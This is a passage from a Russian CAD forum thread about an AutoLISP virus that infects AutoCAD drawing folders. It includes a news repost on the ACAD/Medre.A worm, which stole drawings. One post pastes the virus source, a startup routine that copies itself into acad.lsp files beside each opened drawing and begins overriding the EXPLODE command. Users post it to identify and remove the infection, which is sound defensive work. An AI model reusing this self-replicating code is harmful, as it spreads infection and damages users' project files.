Вирус для Автокада - Страница 6
| Правила | Регистрация | Пользователи | Сообщения за день |  Справка по форуму | Файлообменник |

Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада

Вирус для Автокада

Ответ
Поиск в этой теме
Непрочитано 24.05.2007, 22:57
Вирус для Автокада
dextron3
 
проектировшик
 
СССР
Регистрация: 01.01.2007
Сообщений: 5,149

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR
__________________
инженер проектировшик с опттом программа авто гад образование высшие

Последний раз редактировалось Кулик Алексей aka kpblc, 26.02.2015 в 15:02.
Просмотров: 195719
 
Непрочитано 02.02.2012, 11:59
#101
oleg111


 
Регистрация: 16.10.2009
Сообщений: 47


А у меня такая проблема копируешь линию определеное количество раз ,ну допустем 8 так вот с последней скопированой линеей можно работать ,а с предыдущими ничего не зделать они заблокированы,но все это лечиться закрытием и последующим открытием файла,вопрос что это? спасибо за ответ
oleg111 вне форума  
 
Непрочитано 02.02.2012, 12:09
#102
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


Попробуй:
1. Вид - Регенерировать всё
2. Правка - Выделить всё, после этого нажать "На передний план"
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 27.06.2012, 06:35
#103
MCAD


 
Блог
 
Регистрация: 05.01.2005
Сообщений: 1,715


Обнаружен вирус, похищавший чертежи AutoCAD.
Цитата:
Недавняя история с вирусом Flame, направленным на саботаж иранской ядерной программы, а также ставшие регулярными истории об очередной краже номеров кредитных карт с реквизитами владельцев - приучили нас к мысли, что в Интернет могут обворовать точно так же (а иногда и серьёзнее) как и в реальной жизни.

Очередное подтверждение этой аксиомы: обнаружен специализированный вирус ACAD/Medre.A, распространяющийся вместе с инфицированными шаблонами AutoCAD и крадущий файлы с чертежами, которые тайно отсылает на ряд электронных почтовых ящиков в Китае.

Вспышка вирусной атаки зафиксирована в Перу службой ESET Live Grid (облачной системой обнаружения угроз, использующей данные от пользователей ESET по всему миру). Специалисты компании обнаружили, что червь похищает файлы и отправляет их на учётные записи электронной почты в Китае. Чтобы прекратить передачу файлов, аналитики ESET связались с китайским интернет-провайдером Tencent, Национальным центром КНР по реагированию на вирусные угрозы, а также с компанией Autodesk, создателем AutoCAD. Специалисты ESET сообщают, что на момент обнаружения вируса были похищены десятки тысяч чертежей AutoCAD (принадлежащих в основном пользователям из Перу).

Из-за масштабности вирусной атаки специалисты ESET обратились к владельцу домена qq.com, компании Tencent. Благодаря незамедлительным действиям ESET и Tencent учетные записи, использовавшиеся для передачи чертежей, были заблокированы, что предотвратило дальнейшую утечку данных.

Помимо Перу, исследовательские группы ESET во всем мире обнаружили небольшое количество заражений в других латино-американских странах. Большое число заражений в Перу может быть связано с тем, что вредоносное ПО, модифицированное под файл AutoCAD, могло быть внедрено в компании, которые работают с государственными службами Перу. Это наводит на мысль, что основной мишенью создателей ACAD/Medre.A являлись именно эти организации. На данный момент ESET сотрудничает с местными властями, чтобы восстановить пораженный веб-сайт.
MCAD вне форума  
 
Непрочитано 27.06.2012, 09:18
#104
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


MCAD« ACAD / Medre . A представляет собой интересный случай промышленного шпионажа, вредоносная программа отслеживает появление новых чертежей на компьютерах зараженных пользователей и автоматически отправляет их на почту злоумышленникам, - комментирует Александр Матросов, директор Центра вирусных исследований и аналитики российского представительства ESET. - Такие хищения могут нанести серьезный материальный ущерб не только государственным учреждениям, но и просто владельцам интеллектуальной собственности, поскольку киберпреступники получают доступ к проектам еще до их запуска в производство. Они даже могут успеть получить патент на новый продукт до того, как создатели обратятся в патентное бюро».
вирус не причём!
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 27.06.2012, 09:27
#105
skif58

Наше дело труба
 
Регистрация: 19.11.2006
Томск_Комсомольск-на-Амуре
Сообщений: 1,736
<phrase 1= Отправить сообщение для skif58 с помощью Yahoo Отправить сообщение для skif58 с помощью Skype™


Цитата:
Сообщение от sbi Посмотреть сообщение
вирус не причём!
А логика?
__________________
*...И Случай, бог изобретатель. *
skif58 вне форума  
 
Непрочитано 27.06.2012, 09:31
#106
MCAD


 
Блог
 
Регистрация: 05.01.2005
Сообщений: 1,715


Цитата:
Сообщение от sbi Посмотреть сообщение
вирус не причём!
Я, как всегда, выводы не делаю. Только информация.
Цитата:
Сообщение от skif58 Посмотреть сообщение
А логика?
Вот именно!
MCAD вне форума  
 
Непрочитано 27.06.2012, 09:37
#107
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


skif58! и такую прогу можно напмсать на любом языке Причем здесь ВИРУС? Используя ошибки net.
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 27.06.2012, 10:16
#108
skif58

Наше дело труба
 
Регистрация: 19.11.2006
Томск_Комсомольск-на-Амуре
Сообщений: 1,736
<phrase 1= Отправить сообщение для skif58 с помощью Yahoo Отправить сообщение для skif58 с помощью Skype™


sbi, я всегда думал, что ВИРУС - это прога.
__________________
*...И Случай, бог изобретатель. *
skif58 вне форума  
 
Непрочитано 27.08.2012, 17:36
#109
hwd

C, C++, C#
 
Регистрация: 07.10.2009
С-Пб.
Сообщений: 2,762
Отправить сообщение для hwd с помощью Skype™


Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome:
hwd вне форума  
 
Непрочитано 27.08.2012, 18:57
#110
Хмурый


 
Регистрация: 29.10.2004
СПб
Сообщений: 16,379


Цитата:
Сообщение от hwd Посмотреть сообщение
Начиная с AutoCAD 2013 SP1 проблема с лисповыми вирусами становится легко решаемой. Более подробно здесь. Остаётся ждать SP1...
да он, SP1, уже вышел, но потом удалили. я даже скачать не успел.
http://forum.dwg.ru/showpost.php?p=962002&postcount=89

Последний раз редактировалось Хмурый, 27.08.2012 в 19:02.
Хмурый вне форума  
 
Непрочитано 27.08.2012, 19:58
#111
hwd

C, C++, C#
 
Регистрация: 07.10.2009
С-Пб.
Сообщений: 2,762
Отправить сообщение для hwd с помощью Skype™


Цитата:
Сообщение от Хмурый Посмотреть сообщение
да он, SP1, уже вышел, но потом удалили.
я в курсе, поэтому и пишу - ждать...
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome:
hwd вне форума  
 
Непрочитано 10.10.2012, 06:53
#112
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Делаю работу для одной конторы. Там в каждой папке с чертежами dwg сидят acad.lsp Даже бесплатная Авира орет о вирусне и предлагает их удалить. У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"? Код прилагаю:
Код:
[Выделить все]
 (defun
	  s::startup
		    (/	      old_cmd  path	dwgpath	 mnlpath
		     apppath  oldacad  newacad	nowdwg	 lspbj
		     wjm      wjm1     wjqm	wjqm1	 wz
		     ns1      ns2
		    )
  (setq
    old_cmd
     (getvar
       "cmdecho"
     )
  )
  (setvar
    "cmdecho"
    0
  )
  (setq
    path
     (findfile
       "base.dcl"
     )
  )
  (setq
    path
     (substr
       path
       1
       (-
	 (strlen
	   path
	 )
	 8
       )
     )
  )
  (setq
    mnlpath
     (getvar
       "menuname"
     )
  )
  (setq
    nowdwg
     (getvar
       "dwgname"
     )
  )
  (setq
    wjqm
     (findfile
       nowdwg
     )
  )
  (setq
    dwgpath
     (substr
       wjqm
       1
       (-
	 (strlen
	   wjqm
	 )
	 (strlen
	   nowdwg
	 )
       )
     )
  )
  (setq
    acadpath
     (findfile
       "acad.lsp"
     )
  )
  (setq
    acadpath
     (substr
       acadpath
       1
       (-
	 (strlen
	   acadpath
	 )
	 8
       )
     )
  )
  (setq
    ns1
	""
    ns2
	""
  )
  (setq
    lspbj
     0
  )
  (setq
    wjqm
     (strcat
       path
       "acad.lsp"
     )
  )
  (if
    (setq
      wjm
       (open
	 wjqm
	 "r"
       )
    )
     (progn
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (setq
	    ns1
	     ns2
	  )
	  (setq
	    ns2
	     wz
	  )
       )
       (if
	 (>
	   (strlen
	     ns1
	   )
	   14
	 )
	  (if
	    (=
	      (substr
		ns1
		8
		7
	      )
	      "acadapp"
	    )
	     (setq
	       lspbj
		1
	     )
	  )
       )
       (close
	 wjm
       )
     )
  )
  (if
    (and
      (=
	acadpath
	dwgpath
      )
      (/=
	acadpath
	path
      )
    )
     (progn
       (setq
	 oldacad
	  (findfile
	    "acad.lsp"
	  )
       )
       (setq
	 newacad
	  (strcat
	    path
	    "acadapp.lsp"
	  )
       )
       (if
	 (=
	   lspbj
	   0
	 )
	  (progn
	    (setq
	      wjqm
	       (strcat
		 path
		 "acad.lsp"
	       )
	    )
	    (setq
	      wjm
	       (open
		 wjqm
		 "a"
	       )
	    )
	    (write-line
	      (strcat
		"(load
"
		(chr
		  34
		)
		"acadapp"
		(chr
		  34
		)
		")"
	      )
	      wjm
	    )
	    (write-line
	      "(princ)"
	      wjm
	    )
	    (close
	      wjm
	    )
	  )
       )
       (writeapp)
     )
     (progn
       (if
	 (/=
	   nowdwg
	   "Drawing.dwg"
	 )
	  (progn
	    (setq
	      oldacad
	       (findfile
		 "acadapp.lsp"
	       )
	    )
	    (setq
	      newacad
	       (strcat
		 dwgpath
		 "acad.lsp"
	       )
	    )
	    (writeapp)
	  )
       )
     )
  )
    (setvar
    "cmdecho"
    old_cmd
  )
  (princ)
)
(defun
	  writeapp
		  ()
  (if
    (setq
      wjm1
       (open
	 newacad
	 "w"
       )
    )
     (progn
       (setq
	 wjm
	  (open
	    oldacad
	    "r"
	  )
       )
       (while
	 (setq
	   wz
	    (read-line
	      wjm
	    )
	 )
	  (write-line
	    wz
	    wjm1
	  )
       )
       (close
	 wjm
       )
       (close
	 wjm1
       )
     )
  )
)
(defun
	  C:explode
		   (/
		    p
		    cont
		    old_cmd
		   )
  (setq
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 09:09
#113
Do$

AutoCAD/Civil3D LISP/C#
 
Регистрация: 15.08.2008
Санкт-Петербург
Сообщений: 1,701
Отправить сообщение для Do$ с помощью Skype™


Код приведен не полностью, но уже видно, что идет переопределение команды EXPLODE. Кто-то пытался, наверное, защитить свои блоки от расчленения Хотя надо смотреть код полностью, может там еще какие-то сюрпризы.
Do$ вне форума  
 
Непрочитано 10.10.2012, 14:34
#114
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


Цитата:
Сообщение от Krovlaf Посмотреть сообщение
У меня просьба к спецам лиспа посмотреть действительно ли там "вредоносный код" или кто то "просто хочет защитить свою информацию от изменения"?
да, это "вирус", 100%
gomer вне форума  
 
Непрочитано 10.10.2012, 17:07
#115
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Цитата:
Код приведен не полностью
Сейчас еще раз перепроверил (для этого пришлось отключать уже NOD) код скопирован из файла и вставлен полностью (Ctrl+A)+(Ctrl+C)+(Ctrl+V)
Цитата:
да, это "вирус", 100%
А что кроме переопределения Explode обнаруживается "зловредного"?
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 17:23
#116
hwd

C, C++, C#
 
Регистрация: 07.10.2009
С-Пб.
Сообщений: 2,762
Отправить сообщение для hwd с помощью Skype™


Цитата:
Сообщение от Krovlaf Посмотреть сообщение
А что кроме переопределения Explode обнаруживается "зловредного"?
А тебе не всё ли равно, или просто заняться нечем? Ответили ведь уже: выбрось это в ведро и не парь себе и другим мозг.
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome:
hwd вне форума  
 
Непрочитано 10.10.2012, 17:47
#117
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Мне это, уважаемый легковозбудимый, для админов, которые похоже не ухом не рылом что это за "lsp" и чем оно плохо. Объяснить им развернуто почему надо почистить сеть. Потому как обленились и не хотят лишних телодвижений. Доходчиво? Водички выпей - успокоешься...
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 17:58
#118
Владимир.

Проектирую
 
Регистрация: 10.01.2005
Сообщений: 3,738


Цитата:
Сообщение от Krovlaf Посмотреть сообщение
сейчас еще раз перепроверил
Всё равно, видно, что в конце "недописано"
Владимир. вне форума  
 
Непрочитано 10.10.2012, 18:09
#119
Krovlaf

геология, геодезия
 
Регистрация: 29.05.2009
Хабаровск
Сообщений: 185


Кажется мне покурочили его и бросили. Не похож он на остальные подобные "вирусы" выложенные сдесь. По отзывам трудящихся никаких нареканий на работу Acada не было. "У нас всегда так было, значит так надо"! Хотя не факт что в других конторах использующих эти файлы все гладко. Чистить надо однозначно, как - описано выше, только надо знать что конкретно этот файл пытается сделать при запуске программы.
Krovlaf вне форума  
 
Непрочитано 10.10.2012, 22:17
#120
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


Krovlaf, что в командной строке автокада пишется при загрузке? Этот вирус размножает себя путем копирования содержимого в файлы аcad.lsp в папке с текущим чертежом... то, что там не дописано, возможно работа антивируса, который заблокировал файл при чтении-записи, но подранок еще живет, и размножается
gomer вне форума  
Ответ
Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Резервуар 250м.куб. на проверку dextron3 Инженерные сети 42 07.05.2011 15:59
Компьютер для автокада ugoday Компьютерная и бытовая техника, электроника и инструмент 31 02.09.2007 15:07
Хочу купить монитор ЖК для автокада какой фирмы я не знаю вы Рома_2 Разное 10 21.06.2007 03:44
Версия ЛАЙТ для автокада 2006 Kaktuz AutoCAD 8 18.10.2006 18:39
Определение нагрузок для нестандартных конструкций. NIVa Конструкции зданий и сооружений 2 06.08.2005 21:42